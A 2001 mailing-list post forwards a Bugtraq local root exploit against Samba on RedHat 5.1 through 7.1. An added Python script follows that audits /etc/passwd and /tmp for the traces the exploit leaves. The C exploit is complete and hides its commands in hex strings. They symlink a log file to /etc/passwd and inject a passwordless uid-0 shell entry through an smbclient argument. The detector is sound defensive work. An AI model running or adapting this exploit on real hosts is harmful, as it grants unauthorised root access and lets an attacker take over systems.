samba server exploit
- To: <tlug@example.com>
- Subject: samba server exploit
- From: "roy lo" <roylo@example.com>
- Date: Thu, 25 Oct 2001 17:01:46 -0700
Saw this on bugtraq today. I know some of you run samba servers, so hopefully this will help you to identify the problem in the event of an attack.
/*
* Samba Server r00t exploit
*
* Scope: Local (this exploit) and possible remote if conditions are given.
* Vuln:
* RedHat 5.1
* RedHat 5.2
* RedHat 6.0
* RedHat 6.1
* RedHat 6.2
* RedHat 7.0
* RedHat 7.1
* I don't know if other versions are vulnerable too.
*
* Run this exploit and then take a look at your passwd file.
* Run: ./samba-exp user
*
* Author: Gabriel Maggiotti
* Email: gmaggiot@example.com
* Webpage: http://qb0x.net
*/
#include <stdio.h>
#include <string.h>
int main(int argc,char *argv[])
{
char inject1[]=
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20\x2d\x72\x66\x20\x2f"
"\x74\x6d\x70\x2f\x78\x2e\x6c\x6f\x67";
char inject2[]=
"\x2f\x62\x69\x6e\x2f\x6c\x6e\x20\x2d\x73\x20\x2f\x65"
"\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x2f\x74\x6d"
"\x70\x2f\x78\x2e\x6c\x6f\x67";
char inject3a[100]=
"\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x6d\x62\x63"
"\x6c\x69\x65\x6e\x74\x20\x2f\x2f\x6c\x6f\x63\x61\x6c"
"\x68\x6f\x73\x74\x2f\x22\xa\xa";
char inject3b[]=
"\x3a\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e"
"\x2f\x73\x68\x5c\x6e\x22\x20\x2d\x6e\x20\x2e\x2e\x2f"
"\x2e\x2e\x2f\x2e\x2e\x2f\x74\x6d\x70\x2f\x78\x20\x2d"
"\x4e\xa";
if(argc!=2){
fprintf(stderr,"usage: %s <user>\n",*argv);
return 1;
}
strcat(inject3a,argv[1]);
strcat(inject3a,inject3b);
system(inject1, 0);
system(inject2, 0);
system(inject3a, 0);
return 0;
}
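Added example, not part of the original post or of the Bugtraq code: a defender-side check for the traces this listing leaves, based on its header comment ("take a look at your passwd file") and on the byte strings, which decode to a symlink from /tmp/x.log to /etc/passwd and a passwd entry of the form user::0:0::/:/bin/sh. The function names, the sample passwd content and the account names in it are constructed for illustration.

```python
import os

# Constructed sample: a passwd file after an entry of the decoded form was
# appended, plus one stray log line of the kind a redirected log write leaves.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
alice:x:500:500:Alice:/home/alice:/bin/bash
[2001/10/25 17:01:46, 0] constructed log residue
mallory::0:0::/:/bin/sh
"""


def audit_passwd(text):
    """Return (line_no, reason, line) for every passwd entry that needs review."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:            # log text written into the file
            findings.append((no, "malformed", line))
            continue
        name, passwd, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":   # second superuser account
            findings.append((no, "uid0-not-root", line))
        if passwd == "":                    # login without a password
            findings.append((no, "empty-password", line))
    return findings


def symlinks_into(directory, protected=("/etc/passwd", "/etc/shadow")):
    """Return (link, target) for symlinks in directory that resolve to a protected file."""
    protected = {os.path.realpath(p) for p in protected}
    hits = []
    for entry in os.scandir(directory):
        target = os.path.realpath(entry.path)
        if entry.is_symlink() and target in protected:
            hits.append((entry.path, target))
    return sorted(hits)


if __name__ == "__main__":
    for no, reason, line in audit_passwd(SAMPLE_PASSWD):
        print(f"passwd line {no}: {reason}: {line}")
```

On a live host, pass the contents of /etc/passwd to audit_passwd and run symlinks_into over /tmp and any other world-writable directory.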
- Follow-Ups:
- update for samba server exploit -> Re: samba server exploit
- From: "roy lo" <roylo@example.com>